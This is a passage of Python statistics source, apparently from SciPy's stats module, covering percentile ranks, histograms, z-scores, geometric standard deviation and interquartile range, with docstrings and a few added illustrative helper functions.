# Use np.add.reduce (== np.sum but a little faster) to coerce data type
return np.add.reduce(sorted_[tuple(indexer)] * weights, axis=axis) / sumval
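# Hedged illustration (hypothetical helper, not part of SciPy): when the
# requested percentile falls between two data points, the three interpolation
# methods of `scoreatpercentile` bracket each other as lower <= fraction <= higher.
def _demo_scoreatpercentile_interpolation(a=(1, 2, 3, 4), per=40):
    frac = scoreatpercentile(a, per, interpolation_method='fraction')
    low = scoreatpercentile(a, per, interpolation_method='lower')
    high = scoreatpercentile(a, per, interpolation_method='higher')
    return low, frac, high   # 2.0, 2.2 and 3.0 for the defaults above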
def percentileofscore(a, score, kind='rank'):
"""Compute the percentile rank of a score relative to a list of scores.
A `percentileofscore` of, for example, 80% means that 80% of the
scores in `a` are below the given score. In the case of gaps or
ties, the exact definition depends on the optional keyword, `kind`.
Parameters
----------
a : array_like
Array of scores to which `score` is compared.
score : int or float
Score that is compared to the elements in `a`.
kind : {'rank', 'weak', 'strict', 'mean'}, optional
Specifies the interpretation of the resulting score.
The following options are available (default is 'rank'):
* 'rank': Average percentage ranking of score. In case of multiple
matches, average the percentage rankings of all matching scores.
* 'weak': This kind corresponds to the definition of a cumulative
distribution function. A percentileofscore of 80% means that 80%
of values are less than or equal to the provided score.
* 'strict': Similar to "weak", except that only values that are
strictly less than the given score are counted.
* 'mean': The average of the "weak" and "strict" scores, often used
in testing. See https://en.wikipedia.org/wiki/Percentile_rank
Returns
-------
pcos : float
Percentile-position of score (0-100) relative to `a`.
See Also
--------
numpy.percentile
Examples
--------
Three-quarters of the given values lie below a given score:
>>> from scipy import stats
>>> stats.percentileofscore([1, 2, 3, 4], 3)
75.0
With multiple matches, note how the scores of the two matches, 0.6
and 0.8 respectively, are averaged:
>>> stats.percentileofscore([1, 2, 3, 3, 4], 3)
70.0
Only 2/5 values are strictly less than 3:
>>> stats.percentileofscore([1, 2, 3, 3, 4], 3, kind='strict')
40.0
But 4/5 values are less than or equal to 3:
>>> stats.percentileofscore([1, 2, 3, 3, 4], 3, kind='weak')
80.0
The average between the weak and the strict scores is:
>>> stats.percentileofscore([1, 2, 3, 3, 4], 3, kind='mean')
60.0
"""
if np.isnan(score):
return np.nan
a = np.asarray(a)
n = len(a)
if n == 0:
return 100.0
if kind == 'rank':
left = np.count_nonzero(a < score)
right = np.count_nonzero(a <= score)
pct = (right + left + (1 if right > left else 0)) * 50.0/n
return pct
elif kind == 'strict':
return np.count_nonzero(a < score) / n * 100
elif kind == 'weak':
return np.count_nonzero(a <= score) / n * 100
elif kind == 'mean':
pct = (np.count_nonzero(a < score)
+ np.count_nonzero(a <= score)) / n * 50
return pct
else:
raise ValueError("kind can only be 'rank', 'strict', 'weak' or 'mean'")
HistogramResult = namedtuple('HistogramResult',
('count', 'lowerlimit', 'binsize', 'extrapoints'))
def _histogram(a, numbins=10, defaultlimits=None, weights=None,
printextras=False):
"""Create a histogram.
Separate the range into several bins and return the number of instances
in each bin.
Parameters
----------
a : array_like
Array of scores which will be put into bins.
numbins : int, optional
The number of bins to use for the histogram. Default is 10.
defaultlimits : tuple (lower, upper), optional
The lower and upper values for the range of the histogram.
If no value is given, a range slightly larger than the range of the
values in a is used. Specifically ``(a.min() - s, a.max() + s)``,
where ``s = (1/2)(a.max() - a.min()) / (numbins - 1)``.
weights : array_like, optional
The weights for each value in `a`. Default is None, which gives each
value a weight of 1.0.
printextras : bool, optional
If True, if there are extra points (i.e. the points that fall outside
the bin limits) a warning is raised saying how many of those points
there are. Default is False.
Returns
-------
count : ndarray
Number of points (or sum of weights) in each bin.
lowerlimit : float
Lowest value of histogram, the lower limit of the first bin.
binsize : float
The size of the bins (all bins have the same size).
extrapoints : int
The number of points outside the range of the histogram.
See Also
--------
numpy.histogram
Notes
-----
This histogram is based on numpy's histogram but has a larger range by
default if `defaultlimits` is not set.
"""
a = np.ravel(a)
if defaultlimits is None:
if a.size == 0:
# handle empty arrays. Undetermined range, so use 0-1.
defaultlimits = (0, 1)
else:
# no range given, so use values in `a`
data_min = a.min()
data_max = a.max()
# Have bins extend past min and max values slightly
s = (data_max - data_min) / (2. * (numbins - 1.))
defaultlimits = (data_min - s, data_max + s)
# use numpy's histogram method to compute bins
hist, bin_edges = np.histogram(a, bins=numbins, range=defaultlimits,
weights=weights)
# hist are not always floats, convert to keep with old output
hist = np.array(hist, dtype=float)
# fixed width for bins is assumed, as numpy's histogram gives
# fixed width bins for int values for 'bins'
binsize = bin_edges[1] - bin_edges[0]
# calculate number of extra points
extrapoints = len([v for v in a
if defaultlimits[0] > v or v > defaultlimits[1]])
if extrapoints > 0 and printextras:
warnings.warn("Points outside given histogram range = %s"
% extrapoints)
return HistogramResult(hist, defaultlimits[0], binsize, extrapoints)
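# Hedged illustration (hypothetical helper, not part of SciPy): with an
# explicit range, values outside it are not binned and are reported in
# `extrapoints`; the data mirror the `cumfreq` docstring example further down.
def _demo_histogram_extrapoints(a=(1, 4, 2, 1, 3, 1)):
    res = _histogram(a, numbins=4, defaultlimits=(1.5, 5))
    return res.count, res.extrapoints   # the three 1s fall below 1.5, so 3 extra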
CumfreqResult = namedtuple('CumfreqResult',
('cumcount', 'lowerlimit', 'binsize',
'extrapoints'))
def cumfreq(a, numbins=10, defaultreallimits=None, weights=None):
"""Return a cumulative frequency histogram, using the histogram function.
A cumulative histogram is a mapping that counts the cumulative number of
observations in all of the bins up to the specified bin.
Parameters
----------
a : array_like
Input array.
numbins : int, optional
The number of bins to use for the histogram. Default is 10.
defaultreallimits : tuple (lower, upper), optional
The lower and upper values for the range of the histogram.
If no value is given, a range slightly larger than the range of the
values in `a` is used. Specifically ``(a.min() - s, a.max() + s)``,
where ``s = (1/2)(a.max() - a.min()) / (numbins - 1)``.
weights : array_like, optional
The weights for each value in `a`. Default is None, which gives each
value a weight of 1.0.
Returns
-------
cumcount : ndarray
Binned values of cumulative frequency.
lowerlimit : float
Lower real limit.
binsize : float
Width of each bin.
extrapoints : int
Extra points.
Examples
--------
>>> import matplotlib.pyplot as plt
>>> from numpy.random import default_rng
>>> from scipy import stats
>>> rng = default_rng()
>>> x = [1, 4, 2, 1, 3, 1]
>>> res = stats.cumfreq(x, numbins=4, defaultreallimits=(1.5, 5))
>>> res.cumcount
array([ 1., 2., 3., 3.])
>>> res.extrapoints
3
Create a normal distribution with 1000 random values
>>> samples = stats.norm.rvs(size=1000, random_state=rng)
Calculate cumulative frequencies
>>> res = stats.cumfreq(samples, numbins=25)
Calculate space of values for x
>>> x = res.lowerlimit + np.linspace(0, res.binsize*res.cumcount.size,
... res.cumcount.size)
Plot histogram and cumulative histogram
>>> fig = plt.figure(figsize=(10, 4))
>>> ax1 = fig.add_subplot(1, 2, 1)
>>> ax2 = fig.add_subplot(1, 2, 2)
>>> ax1.hist(samples, bins=25)
>>> ax1.set_title('Histogram')
>>> ax2.bar(x, res.cumcount, width=res.binsize)
>>> ax2.set_title('Cumulative histogram')
>>> ax2.set_xlim([x.min(), x.max()])
>>> plt.show()
"""
h, l, b, e = _histogram(a, numbins, defaultreallimits, weights=weights)
cumhist = np.cumsum(h * 1, axis=0)
return CumfreqResult(cumhist, l, b, e)
RelfreqResult = namedtuple('RelfreqResult',
('frequency', 'lowerlimit', 'binsize',
'extrapoints'))
def relfreq(a, numbins=10, defaultreallimits=None, weights=None):
"""Return a relative frequency histogram, using the histogram function.
A relative frequency histogram is a mapping of the number of
observations in each of the bins relative to the total number of
observations.
Parameters
----------
a : array_like
Input array.
numbins : int, optional
The number of bins to use for the histogram. Default is 10.
defaultreallimits : tuple (lower, upper), optional
The lower and upper values for the range of the histogram.
If no value is given, a range slightly larger than the range of the
values in a is used. Specifically ``(a.min() - s, a.max() + s)``,
where ``s = (1/2)(a.max() - a.min()) / (numbins - 1)``.
weights : array_like, optional
The weights for each value in `a`. Default is None, which gives each
value a weight of 1.0.
Returns
-------
frequency : ndarray
Binned values of relative frequency.
lowerlimit : float
Lower real limit.
binsize : float
Width of each bin.
extrapoints : int
Extra points.
Examples
--------
>>> import matplotlib.pyplot as plt
>>> from numpy.random import default_rng
>>> from scipy import stats
>>> rng = default_rng()
>>> a = np.array([2, 4, 1, 2, 3, 2])
>>> res = stats.relfreq(a, numbins=4)
>>> res.frequency
array([ 0.16666667, 0.5 , 0.16666667, 0.16666667])
>>> np.sum(res.frequency) # relative frequencies should add up to 1
1.0
Create a normal distribution with 1000 random values
>>> samples = stats.norm.rvs(size=1000, random_state=rng)
Calculate relative frequencies
>>> res = stats.relfreq(samples, numbins=25)
Calculate space of values for x
>>> x = res.lowerlimit + np.linspace(0, res.binsize*res.frequency.size,
... res.frequency.size)
Plot relative frequency histogram
>>> fig = plt.figure(figsize=(5, 4))
>>> ax = fig.add_subplot(1, 1, 1)
>>> ax.bar(x, res.frequency, width=res.binsize)
>>> ax.set_title('Relative frequency histogram')
>>> ax.set_xlim([x.min(), x.max()])
>>> plt.show()
"""
a = np.asanyarray(a)
h, l, b, e = _histogram(a, numbins, defaultreallimits, weights=weights)
h = h / a.shape[0]
return RelfreqResult(h, l, b, e)
#####################################
# VARIABILITY FUNCTIONS #
#####################################
def obrientransform(*args):
"""Compute the O'Brien transform on input data (any number of arrays).
Used to test for homogeneity of variance prior to running one-way stats.
Each array in ``*args`` is one level of a factor.
If `f_oneway` is run on the transformed data and found significant,
the variances are unequal. From Maxwell and Delaney [1]_, p.112.
Parameters
----------
*args : tuple of array_like
Any number of arrays.
Returns
-------
obrientransform : ndarray
Transformed data for use in an ANOVA. The first dimension
of the result corresponds to the sequence of transformed
arrays. If the arrays given are all 1-D of the same length,
the return value is a 2-D array; otherwise it is a 1-D array
of type object, with each element being an ndarray.
References
----------
.. [1] S. E. Maxwell and H. D. Delaney, "Designing Experiments and
Analyzing Data: A Model Comparison Perspective", Wadsworth, 1990.
Examples
--------
We'll test the following data sets for differences in their variance.
>>> x = [10, 11, 13, 9, 7, 12, 12, 9, 10]
>>> y = [13, 21, 5, 10, 8, 14, 10, 12, 7, 15]
Apply the O'Brien transform to the data.
>>> from scipy.stats import obrientransform
>>> tx, ty = obrientransform(x, y)
Use `scipy.stats.f_oneway` to apply a one-way ANOVA test to the
transformed data.
>>> from scipy.stats import f_oneway
>>> F, p = f_oneway(tx, ty)
>>> p
0.1314139477040335
If we require that ``p < 0.05`` for significance, we cannot conclude
that the variances are different.
"""
TINY = np.sqrt(np.finfo(float).eps)
# `arrays` will hold the transformed arguments.
arrays = []
sLast = None
for arg in args:
a = np.asarray(arg)
n = len(a)
mu = np.mean(a)
sq = (a - mu)**2
sumsq = sq.sum()
# The O'Brien transform.
t = ((n - 1.5) * n * sq - 0.5 * sumsq) / ((n - 1) * (n - 2))
# Check that the mean of the transformed data is equal to the
# original variance.
var = sumsq / (n - 1)
if abs(var - np.mean(t)) > TINY:
raise ValueError('Lack of convergence in obrientransform.')
arrays.append(t)
sLast = a.shape
if sLast:
for arr in arrays[:-1]:
if sLast != arr.shape:
return np.array(arrays, dtype=object)
return np.array(arrays)
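# Hedged illustration (hypothetical helper, not part of SciPy): the defining
# property of the O'Brien transform, which `obrientransform` itself verifies,
# is that the mean of the transformed data equals the sample variance of the
# original data.
def _demo_obrientransform_property(x=(10, 11, 13, 9, 7, 12, 12, 9, 10)):
    t, = obrientransform(x)
    return np.mean(t), np.var(x, ddof=1)   # these two values should agree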
def sem(a, axis=0, ddof=1, nan_policy='propagate'):
"""Compute standard error of the mean.
Calculate the standard error of the mean (or standard error of
measurement) of the values in the input array.
Parameters
----------
a : array_like
An array containing the values for which the standard error is
returned.
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over
the whole array `a`.
ddof : int, optional
Delta degrees-of-freedom. How many degrees of freedom to adjust
for bias in limited samples relative to the population estimate
of variance. Defaults to 1.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
s : ndarray or float
The standard error of the mean in the sample(s), along the input axis.
Notes
-----
The default value for `ddof` is different from the default (0) used by other
ddof containing routines, such as np.std and np.nanstd.
Examples
--------
Find standard error along the first axis:
>>> from scipy import stats
>>> a = np.arange(20).reshape(5,4)
>>> stats.sem(a)
array([ 2.8284, 2.8284, 2.8284, 2.8284])
Find standard error across the whole array, using n degrees of freedom:
>>> stats.sem(a, axis=None, ddof=0)
1.2893796958227628
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.sem(a, axis, ddof)
n = a.shape[axis]
s = np.std(a, axis=axis, ddof=ddof) / np.sqrt(n)
return s
def _isconst(x):
"""
Check if all values in x are the same. nans are ignored.
x must be a 1d array.
The return value is a 1d array with length 1, so it can be used
in np.apply_along_axis.
"""
y = x[~np.isnan(x)]
if y.size == 0:
return np.array([True])
else:
return (y[0] == y).all(keepdims=True)
def _quiet_nanmean(x):
"""
Compute nanmean for the 1d array x, but quietly return nan if x is all nan.
The return value is a 1d array with length 1, so it can be used
in np.apply_along_axis.
"""
y = x[~np.isnan(x)]
if y.size == 0:
return np.array([np.nan])
else:
return np.mean(y, keepdims=True)
def _quiet_nanstd(x, ddof=0):
"""
Compute nanstd for the 1d array x, but quietly return nan if x is all nan.
The return value is a 1d array with length 1, so it can be used
in np.apply_along_axis.
"""
y = x[~np.isnan(x)]
if y.size == 0:
return np.array([np.nan])
else:
return np.std(y, keepdims=True, ddof=ddof)
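# Hedged illustration (hypothetical helper, not part of SciPy): the three 1-d
# helpers above return length-1 arrays so they stack cleanly under
# `np.apply_along_axis`, and they quietly handle all-nan slices. On the row
# below the nan is simply ignored.
def _demo_nan_aware_helpers(row=(1.0, np.nan, 1.0)):
    x = np.asarray(row, dtype=float)
    return _quiet_nanmean(x)[0], _quiet_nanstd(x)[0], _isconst(x)[0]  # 1.0, 0.0, True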
def zscore(a, axis=0, ddof=0, nan_policy='propagate'):
"""
Compute the z score.
Compute the z score of each value in the sample, relative to the
sample mean and standard deviation.
Parameters
----------
a : array_like
An array like object containing the sample data.
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over
the whole array `a`.
ddof : int, optional
Degrees of freedom correction in the calculation of the
standard deviation. Default is 0.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan. 'propagate' returns nan,
'raise' throws an error, 'omit' performs the calculations ignoring nan
values. Default is 'propagate'. Note that when the value is 'omit',
nans in the input also propagate to the output, but they do not affect
the z-scores computed for the non-nan values.
Returns
-------
zscore : array_like
The z-scores, standardized by mean and standard deviation of
input array `a`.
Notes
-----
This function preserves ndarray subclasses, and works also with
matrices and masked arrays (it uses `asanyarray` instead of
`asarray` for parameters).
Examples
--------
>>> a = np.array([ 0.7972, 0.0767, 0.4383, 0.7866, 0.8091,
... 0.1954, 0.6307, 0.6599, 0.1065, 0.0508])
>>> from scipy import stats
>>> stats.zscore(a)
array([ 1.1273, -1.247 , -0.0552, 1.0923, 1.1664, -0.8559, 0.5786,
0.6748, -1.1488, -1.3324])
Computing along a specified axis, using n-1 degrees of freedom
(``ddof=1``) to calculate the standard deviation:
>>> b = np.array([[ 0.3148, 0.0478, 0.6243, 0.4608],
... [ 0.7149, 0.0775, 0.6072, 0.9656],
... [ 0.6341, 0.1403, 0.9759, 0.4064],
... [ 0.5918, 0.6948, 0.904 , 0.3721],
... [ 0.0921, 0.2481, 0.1188, 0.1366]])
>>> stats.zscore(b, axis=1, ddof=1)
array([[-0.19264823, -1.28415119, 1.07259584, 0.40420358],
[ 0.33048416, -1.37380874, 0.04251374, 1.00081084],
[ 0.26796377, -1.12598418, 1.23283094, -0.37481053],
[-0.22095197, 0.24468594, 1.19042819, -1.21416216],
[-0.82780366, 1.4457416 , -0.43867764, -0.1792603 ]])
An example with `nan_policy='omit'`:
>>> x = np.array([[25.11, 30.10, np.nan, 32.02, 43.15],
... [14.95, 16.06, 121.25, 94.35, 29.81]])
>>> stats.zscore(x, axis=1, nan_policy='omit')
array([[-1.13490897, -0.37830299, nan, -0.08718406, 1.60039602],
[-0.91611681, -0.89090508, 1.4983032 , 0.88731639, -0.5785977 ]])
"""
return zmap(a, a, axis=axis, ddof=ddof, nan_policy=nan_policy)
def gzscore(a, *, axis=0, ddof=0, nan_policy='propagate'):
"""
Compute the geometric standard score.
Compute the geometric z score of each strictly positive value in the
sample, relative to the geometric mean and standard deviation.
Mathematically the geometric z score can be evaluated as::
gzscore = log(a/gmu) / log(gsigma)
where ``gmu`` (resp. ``gsigma``) is the geometric mean (resp. standard
deviation).
Parameters
----------
a : array_like
Sample data.
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over
the whole array `a`.
ddof : int, optional
Degrees of freedom correction in the calculation of the
standard deviation. Default is 0.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan. 'propagate' returns nan,
'raise' throws an error, 'omit' performs the calculations ignoring nan
values. Default is 'propagate'. Note that when the value is 'omit',
nans in the input also propagate to the output, but they do not affect
the geometric z scores computed for the non-nan values.
Returns
-------
gzscore : array_like
The geometric z scores, standardized by geometric mean and geometric
standard deviation of input array `a`.
See Also
--------
gmean : Geometric mean
gstd : Geometric standard deviation
zscore : Standard score
Notes
-----
This function preserves ndarray subclasses, and works also with
matrices and masked arrays (it uses ``asanyarray`` instead of
``asarray`` for parameters).
.. versionadded:: 1.8
Examples
--------
Draw samples from a log-normal distribution:
>>> from scipy.stats import zscore, gzscore
>>> import matplotlib.pyplot as plt
>>> rng = np.random.default_rng()
>>> mu, sigma = 3., 1. # mean and standard deviation
>>> x = rng.lognormal(mu, sigma, size=500)
Display the histogram of the samples:
>>> fig, ax = plt.subplots()
>>> ax.hist(x, 50)
>>> plt.show()
Display the histogram of the samples standardized by the classical zscore.
Distribution is rescaled but its shape is unchanged.
>>> fig, ax = plt.subplots()
>>> ax.hist(zscore(x), 50)
>>> plt.show()
Demonstrate that the distribution of geometric zscores is rescaled and
quasinormal:
>>> fig, ax = plt.subplots()
>>> ax.hist(gzscore(x), 50)
>>> plt.show()
"""
a = np.asanyarray(a)
log = ma.log if isinstance(a, ma.MaskedArray) else np.log
return zscore(log(a), axis=axis, ddof=ddof, nan_policy=nan_policy)
def zmap(scores, compare, axis=0, ddof=0, nan_policy='propagate'):
"""
Calculate the relative z-scores.
Return an array of z-scores, i.e., scores that are standardized to
zero mean and unit variance, where mean and variance are calculated
from the comparison array.
Parameters
----------
scores : array_like
The input for which z-scores are calculated.
compare : array_like
The input from which the mean and standard deviation of the
normalization are taken; assumed to have the same dimension as
`scores`.
axis : int or None, optional
Axis over which mean and variance of `compare` are calculated.
Default is 0. If None, compute over the whole array `scores`.
ddof : int, optional
Degrees of freedom correction in the calculation of the
standard deviation. Default is 0.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle the occurrence of nans in `compare`.
'propagate' returns nan, 'raise' raises an exception, 'omit'
performs the calculations ignoring nan values. Default is
'propagate'. Note that when the value is 'omit', nans in `scores`
also propagate to the output, but they do not affect the z-scores
computed for the non-nan values.
Returns
-------
zscore : array_like
Z-scores, in the same shape as `scores`.
Notes
-----
This function preserves ndarray subclasses, and works also with
matrices and masked arrays (it uses `asanyarray` instead of
`asarray` for parameters).
Examples
--------
>>> from scipy.stats import zmap
>>> a = [0.5, 2.0, 2.5, 3]
>>> b = [0, 1, 2, 3, 4]
>>> zmap(a, b)
array([-1.06066017, 0. , 0.35355339, 0.70710678])
"""
a = np.asanyarray(compare)
if a.size == 0:
return np.empty(a.shape)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
if axis is None:
mn = _quiet_nanmean(a.ravel())
std = _quiet_nanstd(a.ravel(), ddof=ddof)
isconst = _isconst(a.ravel())
else:
mn = np.apply_along_axis(_quiet_nanmean, axis, a)
std = np.apply_along_axis(_quiet_nanstd, axis, a, ddof=ddof)
isconst = np.apply_along_axis(_isconst, axis, a)
else:
mn = a.mean(axis=axis, keepdims=True)
std = a.std(axis=axis, ddof=ddof, keepdims=True)
if axis is None:
isconst = (a.item(0) == a).all()
else:
isconst = (_first(a, axis) == a).all(axis=axis, keepdims=True)
# Set std deviations that are 0 to 1 to avoid division by 0.
std[isconst] = 1.0
z = (scores - mn) / std
# Set the outputs associated with a constant input to nan.
z[np.broadcast_to(isconst, z.shape)] = np.nan
return z
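# Hedged illustration (hypothetical helper, not part of SciPy): when a slice
# of `compare` is constant, `zmap` avoids dividing by a zero standard
# deviation and instead returns nan for the corresponding outputs, exactly as
# the two lines above do.
def _demo_zmap_constant_slice():
    scores = np.array([[1.0, 2.0], [3.0, 4.0]])
    compare = np.array([[5.0, 1.0], [5.0, 3.0]])   # first column is constant
    return zmap(scores, compare)                   # first output column is nan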
def gstd(a, axis=0, ddof=1):
"""
Calculate the geometric standard deviation of an array.
The geometric standard deviation describes the spread of a set of numbers
where the geometric mean is preferred. It is a multiplicative factor, and
so a dimensionless quantity.
It is defined as the exponent of the standard deviation of ``log(a)``.
Mathematically the population geometric standard deviation can be
evaluated as::
gstd = exp(std(log(a)))
.. versionadded:: 1.3.0
Parameters
----------
a : array_like
An array like object containing the sample data.
axis : int, tuple or None, optional
Axis along which to operate. Default is 0. If None, compute over
the whole array `a`.
ddof : int, optional
Degree of freedom correction in the calculation of the
geometric standard deviation. Default is 1.
Returns
-------
ndarray or float
An array of the geometric standard deviation. If `axis` is None or `a`
is a 1d array a float is returned.
See Also
--------
gmean : Geometric mean
numpy.std : Standard deviation
Notes
-----
As the calculation requires the use of logarithms the geometric standard
deviation only supports strictly positive values. Any non-positive or
infinite values will raise a `ValueError`.
The geometric standard deviation is sometimes confused with the exponent of
the standard deviation, ``exp(std(a))``. Instead the geometric standard
deviation is ``exp(std(log(a)))``.
The default value for `ddof` is different from the default value (0) used
by other ddof containing functions, such as ``np.std`` and ``np.nanstd``.
References
----------
.. [1] Kirkwood, T. B., "Geometric means and measures of dispersion",
Biometrics, vol. 35, pp. 908-909, 1979
Examples
--------
Find the geometric standard deviation of a log-normally distributed sample.
Note that the standard deviation of the distribution is one, on a
log scale this evaluates to approximately ``exp(1)``.
>>> from scipy.stats import gstd
>>> rng = np.random.default_rng()
>>> sample = rng.lognormal(mean=0, sigma=1, size=1000)
>>> gstd(sample)
2.810010162475324
Compute the geometric standard deviation of a multidimensional array and
of a given axis.
>>> a = np.arange(1, 25).reshape(2, 3, 4)
>>> gstd(a, axis=None)
2.2944076136018947
>>> gstd(a, axis=2)
array([[1.82424757, 1.22436866, 1.13183117],
[1.09348306, 1.07244798, 1.05914985]])
>>> gstd(a, axis=(1,2))
array([2.12939215, 1.22120169])
The geometric standard deviation further handles masked arrays.
>>> a = np.arange(1, 25).reshape(2, 3, 4)
>>> ma = np.ma.masked_where(a > 16, a)
>>> ma
masked_array(
data=[[[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]],
[[13, 14, 15, 16],
[--, --, --, --],
[--, --, --, --]]],
mask=[[[False, False, False, False],
[False, False, False, False],
[False, False, False, False]],
[[False, False, False, False],
[ True, True, True, True],
[ True, True, True, True]]],
fill_value=999999)
>>> gstd(ma, axis=2)
masked_array(
data=[[1.8242475707663655, 1.2243686572447428, 1.1318311657788478],
[1.0934830582350938, --, --]],
mask=[[False, False, False],
[False, True, True]],
fill_value=999999)
"""
a = np.asanyarray(a)
log = ma.log if isinstance(a, ma.MaskedArray) else np.log
try:
with warnings.catch_warnings():
warnings.simplefilter("error", RuntimeWarning)
return np.exp(np.std(log(a), axis=axis, ddof=ddof))
except RuntimeWarning as w:
if np.isinf(a).any():
raise ValueError(
'Infinite value encountered. The geometric standard deviation '
'is defined for strictly positive values only.'
) from w
a_nan = np.isnan(a)
a_nan_any = a_nan.any()
# exclude NaN's from negativity check, but
# avoid expensive masking for arrays with no NaN
if ((a_nan_any and np.less_equal(np.nanmin(a), 0)) or
(not a_nan_any and np.less_equal(a, 0).any())):
raise ValueError(
'Non positive value encountered. The geometric standard '
'deviation is defined for strictly positive values only.'
) from w
elif 'Degrees of freedom <= 0 for slice' == str(w):
raise ValueError(w) from w
else:
# Remaining warnings don't need to be exceptions.
return np.exp(np.std(log(a, where=~a_nan), axis=axis, ddof=ddof))
except TypeError as e:
raise ValueError(
'Invalid array input. The inputs could not be '
'safely coerced to any supported types') from e
# Private dictionary initialized only once at module level
# See https://en.wikipedia.org/wiki/Robust_measures_of_scale
_scale_conversions = {'raw': 1.0,
'normal': special.erfinv(0.5) * 2.0 * math.sqrt(2.0)}
def iqr(x, axis=None, rng=(25, 75), scale=1.0, nan_policy='propagate',
interpolation='linear', keepdims=False):
r"""
Compute the interquartile range of the data along the specified axis.
The interquartile range (IQR) is the difference between the 75th and
25th percentile of the data. It is a measure of the dispersion
similar to standard deviation or variance, but is much more robust
against outliers [2]_.
The ``rng`` parameter allows this function to compute other
percentile ranges than the actual IQR. For example, setting
``rng=(0, 100)`` is equivalent to `numpy.ptp`.
The IQR of an empty array is `np.nan`.
.. versionadded:: 0.18.0
Parameters
----------
x : array_like
Input array or object that can be converted to an array.
axis : int or sequence of int, optional
Axis along which the range is computed. The default is to
compute the IQR for the entire array.
rng : Two-element sequence containing floats in range of [0,100], optional
Percentiles over which to compute the range. Each must be
between 0 and 100, inclusive. The default is the true IQR:
``(25, 75)``. The order of the elements is not important.
scale : scalar or str, optional
The numerical value of scale will be divided out of the final
result. The following string values are recognized:
* 'raw' : No scaling, just return the raw IQR.
**Deprecated!** Use ``scale=1`` instead.
* 'normal' : Scale by
:math:`2 \sqrt{2} erf^{-1}(\frac{1}{2}) \approx 1.349`.
The default is 1.0. The use of ``scale='raw'`` is deprecated.
Array-like `scale` is also allowed, as long
as it broadcasts correctly to the output such that
``out / scale`` is a valid operation. The output dimensions
depend on the input array, `x`, the `axis` argument, and the
`keepdims` flag.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
interpolation : str, optional
Specifies the interpolation method to use when the percentile
boundaries lie between two data points ``i`` and ``j``.
The following options are available (default is 'linear'):
* 'linear': ``i + (j - i)*fraction``, where ``fraction`` is the
fractional part of the index surrounded by ``i`` and ``j``.
* 'lower': ``i``.
* 'higher': ``j``.
* 'nearest': ``i`` or ``j`` whichever is nearest.
* 'midpoint': ``(i + j)/2``.
For NumPy >= 1.22.0, the additional options provided by the ``method``
keyword of `numpy.percentile` are also valid.
keepdims : bool, optional
If this is set to True, the reduced axes are left in the
result as dimensions with size one. With this option, the result
will broadcast correctly against the original array `x`.
Returns
-------
iqr : scalar or ndarray
If ``axis=None``, a scalar is returned. If the input contains
integers or floats of smaller precision than ``np.float64``, then the
output data-type is ``np.float64``. Otherwise, the output data-type is
the same as that of the input.
See Also
--------
numpy.std, numpy.var
References
----------
.. [1] "Interquartile range" https://en.wikipedia.org/wiki/Interquartile_range
.. [2] "Robust measures of scale" https://en.wikipedia.org/wiki/Robust_measures_of_scale
.. [3] "Quantile" https://en.wikipedia.org/wiki/Quantile
Examples
--------
>>> from scipy.stats import iqr
>>> x = np.array([[10, 7, 4], [3, 2, 1]])
>>> x
array([[10, 7, 4],
[ 3, 2, 1]])
>>> iqr(x)
4.0
>>> iqr(x, axis=0)
array([ 3.5, 2.5, 1.5])
>>> iqr(x, axis=1)
array([ 3., 1.])
>>> iqr(x, axis=1, keepdims=True)
array([[ 3.],
[ 1.]])
"""
x = asarray(x)
# This check prevents percentile from raising an error later. Also, it is
# consistent with `np.var` and `np.std`.
if not x.size:
return np.nan
# An error may be raised here, so fail-fast, before doing lengthy
# computations, even though `scale` is not used until later
if isinstance(scale, str):
scale_key = scale.lower()
if scale_key not in _scale_conversions:
raise ValueError("{0} not a valid scale for `iqr`".format(scale))
if scale_key == 'raw':
warnings.warn(
"use of scale='raw' is deprecated, use scale=1.0 instead",
np.VisibleDeprecationWarning
)
scale = _scale_conversions[scale_key]
# Select the percentile function to use based on nans and policy
contains_nan, nan_policy = _contains_nan(x, nan_policy)
if contains_nan and nan_policy == 'omit':
percentile_func = np.nanpercentile
else:
percentile_func = np.percentile
if len(rng) != 2:
raise TypeError("quantile range must be two element sequence")
if np.isnan(rng).any():
raise ValueError("range must not contain NaNs")
rng = sorted(rng)
if NumpyVersion(np.__version__) >= '1.22.0':
pct = percentile_func(x, rng, axis=axis, method=interpolation,
keepdims=keepdims)
else:
pct = percentile_func(x, rng, axis=axis, interpolation=interpolation,
keepdims=keepdims)
out = np.subtract(pct[1], pct[0])
if scale != 1.0:
out /= scale
return out
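# Hedged illustration (hypothetical helper, not part of SciPy): as noted in
# the docstring, setting ``rng=(0, 100)`` makes `iqr` compute the full range
# of the data, i.e. the same quantity as `numpy.ptp`.
def _demo_iqr_full_range(x=((10, 7, 4), (3, 2, 1))):
    x = np.asarray(x)
    return iqr(x, rng=(0, 100)), np.ptp(x)   # both equal 9 for this data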
def _mad_1d(x, center, nan_policy):
# Median absolute deviation for 1-d array x.
# This is a helper function for `median_abs_deviation`; it assumes its
# arguments have been validated already. In particular, x must be a
# 1-d numpy array, center must be callable, and if nan_policy is not
# 'propagate', it is assumed to be 'omit', because 'raise' is handled
# in `median_abs_deviation`.
# No warning is generated if x is empty or all nan.
isnan = np.isnan(x)
if isnan.any():
if nan_policy == 'propagate':
return np.nan
x = x[~isnan]
if x.size == 0:
# MAD of an empty array is nan.
return np.nan
# Edge cases have been handled, so do the basic MAD calculation.
med = center(x)
mad = np.median(np.abs(x - med))
return mad
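# Hedged illustration (hypothetical helper, not part of SciPy): `_mad_1d` is
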